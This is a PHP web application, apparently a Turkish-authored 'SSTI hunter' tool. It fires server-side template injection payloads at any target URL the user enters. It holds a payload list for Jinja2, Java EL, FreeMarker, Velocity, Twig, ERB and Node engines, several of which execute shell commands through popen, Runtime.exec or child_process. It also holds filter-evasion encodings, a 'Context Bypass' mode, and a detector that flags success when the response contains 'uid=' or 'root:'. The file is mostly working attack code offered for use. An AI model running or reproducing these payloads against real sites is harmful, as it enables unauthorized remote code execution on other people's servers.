<?php
ini_set('display_errors', '1');
error_reporting(E_ALL);
if (!extension_loaded('curl')) die("CRITICAL: CURL is missing!");
set_time_limit(0);
ini_set('memory_limit', '2G');
class FinalSingularity {
public static function getDatabase($w = "") {
$w = rtrim($w, '/');
return [
"Delimiters & Basics" => ['{{7*7}}', '${7*7}', '{7*7}', '[% 7*7 %]', '{@7*7}', '{# 7*7 #}', '{% 7*7 %}', '<' . '%= 7*7 %>', '<' . '% 7*7 %>', '[[7*7]]', '@@(7*7)', '{{= 7*7 }}', '[# 7*7 #]'],
"Python (Jinja2/Mako/Django)" => [
'{{' . 'config.items()}}', '{{' . 'self.__dict__}}',
'{{' . '().__class__.__mro__[1].__subclasses__()[396](\'id\',shell=True,stdout=-1).communicate()[0].decode()}}',
'${' . 'next(c for c in ().__class__.__base__.__subclasses__() if c.__name__ == "CatchWarnings").__init__.__globals__["sys"].modules["os"].popen("id").read()}'
],
"Java (EL/FreeMarker/Velocity)" => [
'${' . 'T(java.lang.Runtime).getRuntime().exec(\'id\')}',
'${' . '"".getClass().forName("java.lang.Runtime").getMethods()[6].invoke("").exec("id")}',
'<#assign ex="freemarker.template.utility.Execute"?new()>${ex(\'id\')}',
'#set($str="exp")#set($exec=$str.class.forName("java.lang.Runtime").getRuntime().exec("id"))'
],
"PHP (Twig/Smarty/Blade)" => [
'{{' . 'dump(app)}}', '{{' . '["id"]|filter("system")}}',
'{{' . '_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}',
'{' . 'smarty.template_vars}'
],
"Ruby & JS (ERB/EJS/Slim)" => [
'<' . '%= `id` %>', '<' . '%= IO.popen(\'id\').read %>', '<' . '%- 7*7 %>',
'{{' . 'constructor.constructor(\'return process\')().mainModule.require(\'child_process\').execSync(\'id\')}}'
],
"Others (Go/Rust/Razor)" => ['@Model.Value', '@(7*7)', '{{ . }}', '[[ 7*7 ]]', '{{7*7}}']
];
}
public static function applyMatrix($p, $opts) {
$m = ['Raw' => $p];
if (in_array('url', $opts)) $m['URL'] = urlencode($p);
if (in_array('double', $opts)) $m['D-URL'] = urlencode(urlencode($p));
if (in_array('hex', $opts)) { $h = ''; for($i=0;$i<strlen($p);$i++) $h .= '%' . dechex(ord($p[$i])); $m['Hex'] = $h; }
if (in_array('uni', $opts)) { $u = ''; for($i=0;$i<strlen($p);$i++) $u .= '\\u00' . dechex(ord($p[$i])); $m['Unicode'] = $u; }
if (in_array('dec', $opts)) { $d = ''; for($i=0;$i<strlen($p);$i++) $d .= ord($p[$i]) . ','; $m['Decimal'] = rtrim($d, ','); }
if (in_array('ctx', $opts)) { $m['Ctx_SQ'] = "';" . $p . ";//"; $m['Ctx_DQ'] = "\";" . $p . ";//"; $m['Ctx_Tag'] = "}}" . $p . "{{"; }
return $m;
}
}
$results = [];
$stats = ['total' => 0, 'vuln' => 0, 'start' => microtime(true)];
if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_POST['launch'])) {
$target = $_POST['url'];
$params = array_filter(array_map('trim', explode(',', $_POST['params'])));
$webhook = $_POST['webhook'] ?? "";
$opts = $_POST['opts'] ?? ['url'];
$method = $_POST['method'];
$cookies = $_POST['cookies'] ?? "";
$headers = array_filter(array_map('trim', explode("\n", $_POST['headers'])));
$only_vuln = isset($_POST['only_vuln']);
$db = FinalSingularity::getDatabase($webhook);
foreach ($params as $pr) {
foreach ($db as $cat => $list) {
foreach ($list as $raw) {
$vars = FinalSingularity::applyMatrix($raw, $opts);
foreach ($vars as $mode => $final) {
$stats['total']++;
$ch = curl_init();
$payload_data = ["$pr" => $final];
$url = $target;
// ============ CURL BAŞLANGIÇ ============
// Header setup - TEK BİR SEFER
$http_headers = ['Content-Type: application/x-www-form-urlencoded'];
if (!empty($headers)) {
$http_headers = array_merge($http_headers, $headers);
}
// URL setup
if ($method === 'GET') {
$url .= (strpos($url, '?') ? '&' : '?') . http_build_query($payload_data);
}
// CURL OPTIONS - HEPSİ BİRLİKTE
$curl_opts = [
CURLOPT_URL => $url,
CURLOPT_RETURNTRANSFER => 1,
CURLOPT_TIMEOUT => 8,
CURLOPT_CONNECTTIMEOUT => 4,
CURLOPT_SSL_VERIFYPEER => 0,
CURLOPT_SSL_VERIFYHOST => 0,
CURLOPT_HEADER => 1,
CURLOPT_COOKIE => $cookies,
CURLOPT_FOLLOWLOCATION => 1,
CURLOPT_MAXREDIRS => 2,
CURLOPT_NOSIGNAL => 1,
CURLOPT_HTTPHEADER => $http_headers,
CURLOPT_FAILONERROR => 0,
CURLOPT_ENCODING => '',
];
// POST/PUT datası
if ($method !== 'GET') {
$post_fields = http_build_query($payload_data);
$curl_opts[CURLOPT_POSTFIELDS] = $post_fields;
if ($method === 'POST') {
$curl_opts[CURLOPT_POST] = 1;
} else {
$curl_opts[CURLOPT_CUSTOMREQUEST] = $method;
}
}
// Tüm curl ayarlarını bir kez set et
curl_setopt_array($ch, $curl_opts);
// İsteği yap
$resp = @curl_exec($ch);
$info = curl_getinfo($ch);
curl_close($ch);
// Timeout veya hata varsa atla
if ($resp === false) {
continue;
}
// Response parse
$body = substr($resp, $info['header_size']);
$v = preg_match('/49|uid=|root:|etc\/passwd|TemplateRuntimeError/i', $body);
if ($v) $stats['vuln']++;
// Sonuçları kaydet
if (!$only_vuln || $v) {
$results[] = [
'p' => $pr,
'cat' => $cat,
'm' => $mode,
'pld' => $final,
'st' => $info['http_code'] ?? 0,
'len' => strlen($body),
'v' => $v,
'u' => ($method === 'GET' ? $url : $target)
];
}
// Memory temizle
gc_collect_cycles();
}
}
}
}
}
?>
<!DOCTYPE html>
<html lang="tr">
<head>
<meta charset="UTF-8">
<title>SSTI Sovereign Final v43.0</title>
<style>
:root { --bg: #0d1117; --card: #161b22; --border: #30363d; --blue: #58a6ff; --neon: #39ff14; --text: #c9d1d9; --gray: #8b949e; }
body { background: var(--bg); color: var(--text); font-family: -apple-system, system-ui, sans-serif; padding: 20px; font-size: 13px; margin: 0; }
.box { background: var(--card); border: 1px solid var(--border); border-radius: 8px; padding: 25px; margin-bottom: 20px; box-shadow: 0 8px 24px rgba(0,0,0,0.5); }
h1 { color: var(--blue); font-size: 18px; border-bottom: 1px solid var(--border); padding-bottom: 15px; margin-top: 0; font-weight: 600; text-transform: uppercase; }
input, select, textarea { background: #0d1117; border: 1px solid var(--border); color: #fff; padding: 12px; border-radius: 6px; width: 100%; margin-bottom: 15px; outline: none; transition: 0.2s; }
input:focus { border-color: var(--blue); }
.checks { display: flex; gap: 15px; flex-wrap: wrap; margin-bottom: 15px; font-size: 11px; color: var(--gray); }
.btn { background: #238636; color: #fff; border: none; padding: 18px; width: 100%; border-radius: 6px; font-weight: 700; cursor: pointer; text-transform: uppercase; transition: 0.2s; }
.btn:hover { background: #2ea043; box-shadow: 0 0 20px rgba(57, 255, 20, 0.2); }
.stats-bar { display: grid; grid-template-columns: repeat(4, 1fr); gap: 15px; margin-bottom: 20px; }
.stat-item { background: var(--card); border: 1px solid var(--border); padding: 15px; border-radius: 8px; text-align: center; }
.stat-val { display: block; font-size: 20px; font-weight: 800; color: var(--blue); }
table { width: 100%; border-collapse: collapse; border: 1px solid var(--border); border-radius: 6px; overflow: hidden; }
th { background: #1b1f24; padding: 12px; text-align: left; color: var(--gray); font-size: 11px; }
td { padding: 10px; border-bottom: 1px solid var(--border); font-family: 'Consolas', monospace; font-size: 12px; }
.v-row { background: rgba(57, 255, 20, 0.1) !important; color: var(--neon); font-weight: bold; }
.action-btn { background: #21262d; border: 1px solid var(--border); color: var(--blue); padding: 5px 10px; border-radius: 4px; cursor: pointer; font-size: 11px; text-decoration: none; margin-right: 5px; }
</style>
</head>
<body>
<div class="box">
<h1>>> SSTI_HUNTER_FINAL_FIXED_v43</h1>
<form method="POST">
<div style="display:grid; grid-template-columns: 2fr 1fr; gap:15px;">
<div><label>Target URL</label><input type="text" name="url" placeholder="https://site.com/view" required></div>
<div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;">
<div><label>Params</label><input type="text" name="params" value="id,template,q" required></div>
<div><label>Method</label><select name="method"><option>GET</option><option>POST</option><option>PUT</option><option>DELETE</option></select></div>
</div>
</div>
<div style="display:grid; grid-template-columns: 1fr 1fr; gap:15px;">
<div><label>Cookies</label><input type="text" name="cookies" placeholder="session=xyz;"></div>
<div><label>Webhook (OOB)</label><input type="text" name="webhook" placeholder="https://webhook.site/..."></div>
</div>
<div class="checks">
<label><input type="checkbox" name="opts[]" value="url" checked> URL Enc</label>
<label><input type="checkbox" name="opts[]" value="double" checked> Double URL</label>
<label><input type="checkbox" name="opts[]" value="hex" checked> Hex</label>
<label><input type="checkbox" name="opts[]" value="dec" checked> Decimal Bypass</label>
<label><input type="checkbox" name="opts[]" value="ctx" checked> Context Bypass</label>
<label style="color:var(--blue)"><input type="checkbox" name="only_vuln" checked> Sadece Başarılılar</label>
</div>
<button type="submit" name="launch" class="btn">Execute Final Strike</button>
</form>
</div>
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>
<div class="stats-bar">
<div class="stat-item"><span class="stat-val"><?= $stats['total'] ?></span><span style="font-size:10px; color:var(--gray);">TOTAL TESTS</span></div>
<div class="stat-item"><span class="stat-val" style="color:var(--neon)"><?= $stats['vuln'] ?></span><span style="font-size:10px; color:var(--gray);">VULNS FOUND</span></div>
<div class="stat-item"><span class="stat-val"><?= round(microtime(true) - $stats['start'], 2) ?>s</span><span style="font-size:10px; color:var(--gray);">DURATION</span></div>
<div class="stat-item"><span class="stat-val"><?= count($results) ?></span><span style="font-size:10px; color:var(--gray);">REPORTED</span></div>
</div>
<div class="box">
<table>
<thead><tr><th>Param</th><th>Engine</th><th>Mode</th><th>ST</th><th>Size</th><th>Payload</th><th>Actions</th></tr></thead>
<tbody>
<?php if (empty($results)) echo '<tr><td colspan="7" style="text-align:center; color:var(--gray);">Hiçbir bulgu yok.</td></tr>'; ?>
<?php foreach($results as $r): ?>
<tr class="<?= $r['v'] ? 'v-row' : '' ?>">
<td><?= htmlspecialchars($r['p']) ?></td><td><?= $r['cat'] ?></td><td><?= $r['m'] ?></td>
<td><?= $r['st'] ?></td><td><?= $r['len'] ?> B</td>
<td style="max-width:250px; overflow:hidden; text-overflow:ellipsis; white-space:nowrap;"><?= htmlspecialchars($r['pld']) ?></td>
<td>
<button class="action-btn" onclick="navigator.clipboard.writeText('<?= addslashes($r['pld']) ?>'); alert('Kopyalandı!')">COPY</button>
<a href="<?= $r['u'] ?>" target="_blank" class="action-btn">GO</a>
</td>
</tr>
<?php endforeach; ?>
</tbody>
</table>
</div>
<?php endif; ?>
</body>
</html>